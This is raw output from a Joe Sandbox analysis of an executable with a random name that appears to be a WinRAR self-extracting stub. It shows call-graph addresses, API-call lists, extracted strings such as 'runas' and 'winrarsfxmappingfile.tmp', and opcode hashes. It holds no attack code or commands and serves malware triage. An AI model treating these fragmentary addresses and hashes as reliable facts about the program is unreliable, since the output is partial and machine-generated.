7ff716140b51 28624->28625 28630 7ff716111fa0 31 API calls 28625->28630 28633 7ff716140b68 BuildCatchObjectHelperInternal 28625->28633 28628 7ff716140de8 28626->28628 28629 7ff71611129c 33 API calls 28627->28629 28635 7ff716141900 _com_raise_error 14 API calls 28628->28635 28632 7ff7161409a5 28629->28632 28630->28633 28631 7ff716111fa0 31 API calls 28634 7ff716140b93 SetEnvironmentVariableW GetLocalTime 28631->28634 28847 7ff71613cad0 102 API calls 3 library calls 28632->28847 28633->28631 28638 7ff716123e28 swprintf 46 API calls 28634->28638 28639 7ff716140e34 28635->28639 28637 7ff7161409af 28637->28623 28641 7ff7161409f9 OpenFileMappingW 28637->28641 28642 7ff716140adb 28637->28642 28640 7ff716140c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28638->28640 28816 7ff71613b014 LoadBitmapW 28640->28816 28644 7ff716140a19 MapViewOfFile 28641->28644 28645 7ff716140ad0 CloseHandle 28641->28645 28650 7ff71611129c 33 API calls 28642->28650 28644->28645 28647 7ff716140a3f UnmapViewOfFile MapViewOfFile 28644->28647 28645->28663 28647->28645 28651 7ff716140a71 28647->28651 28649 7ff716140c75 28840 7ff7161367b4 28649->28840 28653 7ff716140b00 28650->28653 28848 7ff71613a190 33 API calls 2 library calls 28651->28848 28852 7ff71613fd0c 35 API calls 2 library calls 28653->28852 28657 7ff716140a81 28849 7ff71613fd0c 35 API calls 2 library calls 28657->28849 28658 7ff7161367b4 33 API calls 28661 7ff716140c87 DialogBoxParamW 28658->28661 28659 7ff716140b0a 28659->28663 28665 7ff716140dd7 28659->28665 28671 7ff716140cd3 28661->28671 28662 7ff716140a90 28850 7ff71612b9b4 102 API calls 28662->28850 28663->28624 28668 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28665->28668 28666 7ff716140aa5 28851 7ff71612bb00 102 API calls 28666->28851 28668->28670 28669 7ff716140ab8 28674 7ff716140ac7 UnmapViewOfFile 28669->28674 28670->28622 28672 7ff716140cec 28671->28672 28673 7ff716140ce6 Sleep 28671->28673 28675 7ff716140cfa 28672->28675 28853 7ff716139f4c 49 API calls 2 library calls 28672->28853 28673->28672 28674->28645 28677 7ff716140d06 DeleteObject 28675->28677 28678 7ff716140d1f DeleteObject 28677->28678 28679 7ff716140d25 28677->28679 28678->28679 28680 7ff716140d6d 28679->28680 28681 7ff716140d5b 28679->28681 28843 7ff7161394e4 28680->28843 28854 7ff71613fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 28681->28854 28684 7ff716140d60 CloseHandle 28684->28680 28688->28579 28691->28573 28692->28577 28694 7ff71614281e __scrt_dllmain_crt_thread_attach 28693->28694 28694->28595 28694->28596 28696 7ff716150d4c 28695->28696 28697 7ff716142830 28696->28697 28700 7ff71614ec00 28696->28700 28697->28595 28699 7ff7161451a0 7 API calls 2 library calls 28697->28699 28699->28595 28711 7ff71614f398 EnterCriticalSection 28700->28711 28713 7ff7161191c8 35 API calls 28712->28713 28714 7ff716111130 28713->28714 28717 7ff7161429bc 34 API calls 28714->28717 28716 7ff716142a01 28716->28602 28717->28716 28719 7ff71615073d 28718->28719 28720 7ff716150749 28718->28720 28723 7ff716150570 48 API calls 5 library calls 28719->28723 28720->28609 28722->28609 28723->28720 28855 7ff716142450 28724->28855 28727 7ff71612e07b 28731 7ff71612e503 28727->28731 28862 7ff71614b788 39 API calls _snwprintf 28727->28862 28728 7ff71612e026 GetProcAddress 28729 7ff71612e03b 28728->28729 28730 7ff71612e053 GetProcAddress 28728->28730 28729->28730 28730->28727 28733 7ff71612e068 28730->28733 28732 7ff716126454 34 API calls 28731->28732 28736 7ff71612e50c 28732->28736 28733->28727 28735 7ff71612e3b0 28735->28731 28737 7ff71612e3ba 28735->28737 28738 7ff716127df4 47 API calls 28736->28738 28739 7ff716126454 34 API calls 28737->28739 28746 7ff71612e51a 28738->28746 28740 7ff71612e3c3 CreateFileW 28739->28740 28741 7ff71612e4f0 CloseHandle 28740->28741 28742 7ff71612e403 SetFilePointer 28740->28742 28745 7ff716111fa0 31 API calls 28741->28745 28742->28741 28744 7ff71612e41c ReadFile 28742->28744 28744->28741 28747 7ff71612e444 28744->28747 28745->28731 28751 7ff71612e53e CompareStringW 28746->28751 28752 7ff71611129c 33 API calls 28746->28752 28755 7ff716128090 47 API calls 28746->28755 28757 7ff716111fa0 31 API calls 28746->28757 28765 7ff7161232bc 51 API calls 28746->28765 28786 7ff71612e5cc 28746->28786 28857 7ff7161251a4 28746->28857 28748 7ff71612e458 28747->28748 28749 7ff71612e800 28747->28749 28754 7ff71611129c 33 API calls 28748->28754 28868 7ff716142624 8 API calls 28749->28868 28751->28746 28752->28746 28753 7ff71612e805 28759 7ff71612e48f 28754->28759 28755->28746 28756 7ff71612e63a 28760 7ff71612e648 28756->28760 28761 7ff71612e7c2 28756->28761 28757->28746 28762 7ff71612e4db 28759->28762 28863 7ff71612d0a0 33 API calls 28759->28863 28864 7ff716127eb0 47 API calls 28760->28864 28764 7ff716111fa0 31 API calls 28761->28764 28766 7ff716111fa0 31 API calls 28762->28766 28768 7ff71612e7cb 28764->28768 28765->28746 28769 7ff71612e4e5 28766->28769 28767 7ff71612e651 28770 7ff7161251a4 9 API calls 28767->28770 28772 7ff716111fa0 31 API calls 28768->28772 28773 7ff716111fa0 31 API calls 28769->28773 28774 7ff71612e656 28770->28774 28771 7ff71611129c 33 API calls 28771->28786 28775 7ff71612e7d5 28772->28775 28773->28741 28776 7ff71612e706 28774->28776 28783 7ff71612e661 28774->28783 28778 7ff716142320 _handle_error 8 API calls 28775->28778 28779 7ff71612da98 48 API calls 28776->28779 28777 7ff716128090 47 API calls 28777->28786 28780 7ff71612e7e4 28778->28780 28781 7ff71612e74b AllocConsole 28779->28781 28780->28615 28784 7ff71612e6fb 28781->28784 28785 7ff71612e755 GetCurrentProcessId AttachConsole 28781->28785 28782 7ff716111fa0 31 API calls 28782->28786 28790 7ff71612aae0 48 API calls 28783->28790 28867 7ff7161119e0 31 API calls _invalid_parameter_noinfo_noreturn 28784->28867 28787 7ff71612e76c 28785->28787 28786->28756 28786->28771 28786->28777 28786->28782 28788 7ff7161232bc 51 API calls 28786->28788 28793 7ff71612e778 GetStdHandle WriteConsoleW Sleep FreeConsole 28787->28793 28788->28786 28792 7ff71612e6a5 28790->28792 28791 7ff71612e7b9 ExitProcess 28794 7ff71612da98 48 API calls 28792->28794 28793->28784 28795 7ff71612e6c3 28794->28795 28796 7ff71612aae0 48 API calls 28795->28796 28797 7ff71612e6ce 28796->28797 28865 7ff71612dc2c 33 API calls 28797->28865 28799 7ff71612e6da 28866 7ff7161119e0 31 API calls _invalid_parameter_noinfo_noreturn 28799->28866 28802 7ff71612dd88 28801->28802 28803 7ff716139481 OleInitialize 28802->28803 28804 7ff7161394a7 28803->28804 28805 7ff7161394cd SHGetMalloc 28804->28805 28805->28618 28807 7ff716139a49 28806->28807 28810 7ff716139a4e BuildCatchObjectHelperInternal 28806->28810 28808 7ff716111fa0 31 API calls 28807->28808 28808->28810 28809 7ff716111fa0 31 API calls 28811 7ff716139a7d BuildCatchObjectHelperInternal 28809->28811 28810->28809 28810->28811 28812 7ff716111fa0 31 API calls 28811->28812 28815 7ff716139aac BuildCatchObjectHelperInternal 28811->28815 28812->28815 28813 7ff716139adb BuildCatchObjectHelperInternal 28813->28620 28813->28813 28814 7ff716111fa0 31 API calls 28814->28813 28815->28813 28815->28814 28817 7ff71613b046 28816->28817 28818 7ff71613b03e 28816->28818 28820 7ff71613b04e GetObjectW 28817->28820 28821 7ff71613b063 28817->28821 28869 7ff716138624 FindResourceW 28818->28869 28820->28821 28822 7ff71613849c 4 API calls 28821->28822 28823 7ff71613b078 28822->28823 28824 7ff71613b0ce 28823->28824 28825 7ff71613b09e 28823->28825 28827 7ff716138624 10 API calls 28823->28827 28835 7ff7161298ac 28824->28835 28883 7ff716138504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28825->28883 28828 7ff71613b08a 28827->28828 28828->28825 28830 7ff71613b092 DeleteObject 28828->28830 28829 7ff71613b0a7 28831 7ff7161384cc 4 API calls 28829->28831 28830->28825 28832 7ff71613b0b2 28831->28832 28884 7ff716138df4 16 API calls _handle_error 28832->28884 28834 7ff71613b0bf DeleteObject 28834->28824 28885 7ff7161298dc 28835->28885 28837 7ff7161298ba 28952 7ff71612a43c GetModuleHandleW FindResourceW 28837->28952 28839 7ff7161298c2 28839->28649 28841 7ff7161421d0 33 API calls 28840->28841 28842 7ff7161367fa 28841->28842 28842->28658 28844 7ff716139501 28843->28844 28845 7ff71613950a OleUninitialize 28844->28845 28846 7ff71617e330 28845->28846 28847->28637 28848->28657 28849->28662 28850->28666 28851->28669 28852->28659 28853->28675 28854->28684 28856 7ff71612dff4 GetModuleHandleW 28855->28856 28856->28727 28856->28728 28858 7ff7161251c8 GetVersionExW 28857->28858 28859 7ff7161251fb 28857->28859 28858->28859 28860 7ff716142320 _handle_error 8 API calls 28859->28860 28861 7ff716125228 28860->28861 28861->28746 28862->28735 28863->28759 28864->28767 28865->28799 28866->28784 28867->28791 28868->28753 28870 7ff71613879b 28869->28870 28871 7ff71613864f SizeofResource 28869->28871 28870->28817 28871->28870 28872 7ff716138669 LoadResource 28871->28872 28872->28870 28873 7ff716138682 LockResource 28872->28873 28873->28870 28874 7ff716138697 GlobalAlloc 28873->28874 28874->28870 28875 7ff7161386b8 GlobalLock 28874->28875 28876 7ff716138792 GlobalFree 28875->28876 28877 7ff7161386ca BuildCatchObjectHelperInternal 28875->28877 28876->28870 28878 7ff716138789 GlobalUnlock 28877->28878 28879 7ff7161386f6 GdipAlloc 28877->28879 28878->28876 28880 7ff71613870b 28879->28880 28880->28878 28881 7ff71613875a GdipCreateHBITMAPFromBitmap 28880->28881 28882 7ff716138772 28880->28882 28881->28882 28882->28878 28883->28829 28884->28834 28888 7ff7161298fe _snwprintf 28885->28888 28886 7ff716129973 28962 7ff7161268b0 48 API calls 28886->28962 28888->28886 28890 7ff716129a89 28888->28890 28889 7ff716111fa0 31 API calls 28892 7ff7161299fd 28889->28892 28890->28892 28894 7ff7161120b0 33 API calls 28890->28894 28891 7ff71612997d BuildCatchObjectHelperInternal 28891->28889 28950 7ff71612a42e 28891->28950 28896 7ff7161224c0 54 API calls 28892->28896 28893 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28895 7ff71612a434 28893->28895 28894->28892 28899 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28895->28899 28897 7ff716129a1a 28896->28897 28898 7ff716129a22 28897->28898 28905 7ff716129aad 28897->28905 28901 7ff71612204c 100 API calls 28898->28901 28902 7ff71612a43a 28899->28902 28900 7ff716129b17 28954 7ff71614a450 28900->28954 28903 7ff716129a2b 28901->28903 28903->28895 28906 7ff716129a66 28903->28906 28905->28900 28907 7ff716128e58 33 API calls 28905->28907 28910 7ff716142320 _handle_error 8 API calls 28906->28910 28907->28905 28909 7ff71614a450 31 API calls 28922 7ff716129b57 __vcrt_FlsAlloc 28909->28922 28911 7ff71612a40e 28910->28911 28911->28837 28912 7ff716129c89 28914 7ff716122aa0 101 API calls 28912->28914 28926 7ff716129d5c 28912->28926 28913 7ff716122bb0 101 API calls 28913->28922 28916 7ff716129ca1 28914->28916 28915 7ff7161228d0 104 API calls 28915->28922 28917 7ff7161228d0 104 API calls 28916->28917 28916->28926 28923 7ff716129cc9 28917->28923 28918 7ff71612204c 100 API calls 28920 7ff71612a3f5 28918->28920 28919 7ff716122aa0 101 API calls 28919->28922 28921 7ff716111fa0 31 API calls 28920->28921 28921->28906 28922->28912 28922->28913 28922->28915 28922->28919 28922->28926 28925 7ff716129cd7 __vcrt_FlsAlloc 28923->28925 28923->28926 28963 7ff716130bbc MultiByteToWideChar 28923->28963 28925->28926 28928 7ff71612a157 28925->28928 28929 7ff71612a1ec 28925->28929 28932 7ff71612a14b 28925->28932 28945 7ff716130f68 WideCharToMultiByte 28925->28945 28947 7ff71612a429 28925->28947 28964 7ff71612aa88 45 API calls 2 library calls 28925->28964 28965 7ff71614a270 31 API calls 2 library calls 28925->28965 28926->28918 28928->28929 28966 7ff71614cf90 31 API calls 2 library calls 28928->28966 28937 7ff71612a2c2 28929->28937 28969 7ff71614cf90 31 API calls 2 library calls 28929->28969 28932->28837 28933 7ff71612a2ae 28933->28937 28971 7ff716128cd0 33 API calls 2 library calls 28933->28971 28934 7ff71612a249 28970 7ff71614b7bc 31 API calls _invalid_parameter_noinfo_noreturn 28934->28970 28935 7ff71612a3a2 28936 7ff71614a450 31 API calls 28935->28936 28939 7ff71612a3cb 28936->28939 28937->28935 28943 7ff716128e58 33 API calls 28937->28943 28941 7ff71614a450 31 API calls 28939->28941 28940 7ff71612a16d 28967 7ff71614b7bc 31 API calls _invalid_parameter_noinfo_noreturn 28940->28967 28941->28926 28943->28937 28944 7ff71612a1d8 28944->28929 28968 7ff716128cd0 33 API calls 2 library calls 28944->28968 28945->28925 28972 7ff716142624 8 API calls 28947->28972 28950->28893 28953 7ff71612a468 28952->28953 28953->28839 28955 7ff71614a47d 28954->28955 28961 7ff71614a492 28955->28961 28973 7ff71614d69c 15 API calls abort 28955->28973 28957 7ff71614a487 28974 7ff7161478e4 31 API calls _invalid_parameter_noinfo 28957->28974 28959 7ff716142320 _handle_error 8 API calls 28960 7ff716129b37 28959->28960 28960->28909 28961->28959 28962->28891 28963->28925 28964->28925 28965->28925 28966->28940 28967->28944 28968->28929 28969->28934 28970->28933 28971->28937 28972->28950 28973->28957 28974->28961 28510 7ff7161411cf 28511 7ff716141102 28510->28511 28512 7ff716141900 _com_raise_error 14 API calls 28511->28512 28513 7ff716141141 28512->28513 28522 7ff7161403e0 28523 7ff716140497 28522->28523 28524 7ff71614041f 28522->28524 28526 7ff71612aae0 48 API calls 28523->28526 28525 7ff71612aae0 48 API calls 28524->28525 28527 7ff716140433 28525->28527 28528 7ff7161404ab 28526->28528 28529 7ff71612da98 48 API calls 28527->28529 28530 7ff71612da98 48 API calls 28528->28530 28531 7ff716140442 BuildCatchObjectHelperInternal 28529->28531 28530->28531 28532 7ff716111fa0 31 API calls 28531->28532 28534 7ff7161405c6 28531->28534 28539 7ff7161405cc 28531->28539 28533 7ff716140541 28532->28533 28535 7ff71611250c SetDlgItemTextW 28533->28535 28536 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28534->28536 28538 7ff716140556 SetDlgItemTextW 28535->28538 28536->28539 28537 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28540 7ff7161405d2 28537->28540 28541 7ff71614059c 28538->28541 28542 7ff71614056f 28538->28542 28539->28537 28543 7ff716142320 _handle_error 8 API calls 28541->28543 28542->28541 28545 7ff7161405c1 28542->28545 28544 7ff7161405af 28543->28544 28546 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28545->28546 28546->28534 28976 7ff7161420f0 28977 7ff716142106 _com_error::_com_error 28976->28977 28978 7ff716144078 std::_Xinvalid_argument 2 API calls 28977->28978 28979 7ff716142117 28978->28979 28980 7ff716141900 _com_raise_error 14 API calls 28979->28980 28981 7ff716142163 28980->28981
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                          • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                          • API String ID: 3303814210-2702805183
                          • Opcode ID: fd1327b765be3828c368324082e4329336840963213b892e7af7f095c4632b2e
                          • Instruction ID: 5263927cca3d500f2aa2cc2f208f0a39e79f4dd4f9f2f221cf9fd04237e28f12
                          • Opcode Fuzzy Hash: fd1327b765be3828c368324082e4329336840963213b892e7af7f095c4632b2e
                          • Instruction Fuzzy Hash: DFD27262A08E8281FA10BB25FC552BBE361AF957B0FD04535D94E066A5EF3CE54CE720
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                          • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                          • API String ID: 1830998149-3916287355
                          • Opcode ID: 06592828c2cb139cfb98e04b1855bf5a4071a7d5fc2591e20ae39260eb37534a
                          • Instruction ID: 76ae443d412061ee63db40aaf57f3ac2d110d678b7ff17dfc5d12c50329fa223
                          • Opcode Fuzzy Hash: 06592828c2cb139cfb98e04b1855bf5a4071a7d5fc2591e20ae39260eb37534a
                          • Instruction Fuzzy Hash: 79137172A04F8285FB10AB74EC402EEA7B1EB443B8FD04536DA1E57A99DF38D589D350

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1466 7ff716140754-7ff716140829 call 7ff71612dfd0 call 7ff7161262dc call 7ff71613946c call 7ff716143cf0 call 7ff716139a14 1477 7ff71614082b-7ff716140840 1466->1477 1478 7ff716140860-7ff716140883 1466->1478 1479 7ff71614085b call 7ff71614220c 1477->1479 1480 7ff716140842-7ff716140855 1477->1480 1481 7ff7161408ba-7ff7161408dd 1478->1481 1482 7ff716140885-7ff71614089a 1478->1482 1479->1478 1480->1479 1485 7ff716140ddd-7ff716140de2 call 7ff716147904 1480->1485 1483 7ff7161408df-7ff7161408f4 1481->1483 1484 7ff716140914-7ff716140937 1481->1484 1487 7ff71614089c-7ff7161408af 1482->1487 1488 7ff7161408b5 call 7ff71614220c 1482->1488 1489 7ff71614090f call 7ff71614220c 1483->1489 1490 7ff7161408f6-7ff716140909 1483->1490 1491 7ff716140939-7ff71614094e 1484->1491 1492 7ff71614096e-7ff71614097a GetCommandLineW 1484->1492 1503 7ff716140de3-7ff716140e2f call 7ff716147904 call 7ff716141900 1485->1503 1487->1485 1487->1488 1488->1481 1489->1484 1490->1485 1490->1489 1496 7ff716140969 call 7ff71614220c 1491->1496 1497 7ff716140950-7ff716140963 1491->1497 1499 7ff716140b47-7ff716140b5e call 7ff716126454 1492->1499 1500 7ff716140980-7ff7161409b7 call 7ff71614797c call 7ff71611129c call 7ff71613cad0 1492->1500 1496->1492 1497->1485 1497->1496 1508 7ff716140b89-7ff716140ce4 call 7ff716111fa0 SetEnvironmentVariableW GetLocalTime call 7ff716123e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff71613b014 call 7ff7161298ac call 7ff7161367b4 * 2 DialogBoxParamW call 7ff7161368a8 * 2 1499->1508 1509 7ff716140b60-7ff716140b85 call 7ff716111fa0 call 7ff716143640 1499->1509 1525 7ff7161409b9-7ff7161409cc 1500->1525 1526 7ff7161409ec-7ff7161409f3 1500->1526 1523 7ff716140e34-7ff716140e6a 1503->1523 1572 7ff716140cec-7ff716140cf3 1508->1572 1573 7ff716140ce6 Sleep 1508->1573 1509->1508 1524 7ff716140e6c 1523->1524 1524->1524 1529 7ff7161409e7 call 7ff71614220c 1525->1529 1530 7ff7161409ce-7ff7161409e1 1525->1530 1531 7ff7161409f9-7ff716140a13 OpenFileMappingW 1526->1531 1532 7ff716140adb-7ff716140b12 call 7ff71614797c call 7ff71611129c call 7ff71613fd0c 1526->1532 1529->1526 1530->1503 1530->1529 1536 7ff716140a19-7ff716140a39 MapViewOfFile 1531->1536 1537 7ff716140ad0-7ff716140ad9 CloseHandle 1531->1537 1532->1499 1555 7ff716140b14-7ff716140b27 1532->1555 1536->1537 1540 7ff716140a3f-7ff716140a6f UnmapViewOfFile MapViewOfFile 1536->1540 1537->1499 1540->1537 1544 7ff716140a71-7ff716140aca call 7ff71613a190 call 7ff71613fd0c call 7ff71612b9b4 call 7ff71612bb00 call 7ff71612bb70 UnmapViewOfFile 1540->1544 1544->1537 1558 7ff716140b29-7ff716140b3c 1555->1558 1559 7ff716140b42 call 7ff71614220c 1555->1559 1558->1559 1562 7ff716140dd7-7ff716140ddc call 7ff716147904 1558->1562 1559->1499 1562->1485 1575 7ff716140cfa-7ff716140d1d call 7ff71612b8e0 DeleteObject 1572->1575 1576 7ff716140cf5 call 7ff716139f4c 1572->1576 1573->1572 1580 7ff716140d1f DeleteObject 1575->1580 1581 7ff716140d25-7ff716140d2c 1575->1581 1576->1575 1580->1581 1582 7ff716140d48-7ff716140d59 1581->1582 1583 7ff716140d2e-7ff716140d35 1581->1583 1585 7ff716140d6d-7ff716140d7a 1582->1585 1586 7ff716140d5b-7ff716140d67 call 7ff71613fe24 CloseHandle 1582->1586 1583->1582 1584 7ff716140d37-7ff716140d43 call 7ff71611ba0c 1583->1584 1584->1582 1589 7ff716140d7c-7ff716140d89 1585->1589 1590 7ff716140d9f-7ff716140da4 call 7ff7161394e4 1585->1590 1586->1585 1593 7ff716140d99-7ff716140d9b 1589->1593 1594 7ff716140d8b-7ff716140d93 1589->1594 1595 7ff716140da9-7ff716140dd6 call 7ff716142320 1590->1595 1593->1590 1597 7ff716140d9d 1593->1597 1594->1590 1596 7ff716140d95-7ff716140d97 1594->1596 1596->1590 1597->1590
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                          • API String ID: 1048086575-3710569615
                          • Opcode ID: cf857dfdb846402a04b639880a0f56ecddc48e970ed32f05d0be7d60c6edf358
                          • Instruction ID: 1ca64efcf6da51ac5e4d5fb9b1a9db2096e1a6de34f35ea50a0f5540b8a9c9a2
                          • Opcode Fuzzy Hash: cf857dfdb846402a04b639880a0f56ecddc48e970ed32f05d0be7d60c6edf358
                          • Instruction Fuzzy Hash: CB128771A18F8285FB10AB25FC412BAE361FF857A4F804135DA5D47AA5EF3CE548E720

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                          • String ID: $%s:$CAPTION
                          • API String ID: 1936833115-404845831
                          • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                          • Instruction ID: d015a23e435787f9e64b46a0336d93faaf89dc47f6faf754ad2d8f1ef33d04b3
                          • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                          • Instruction Fuzzy Hash: 1191D632B18A4286F718AF39BC0066AE7A1FB84794F905535EE4D47B58DF3CE809CB10

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
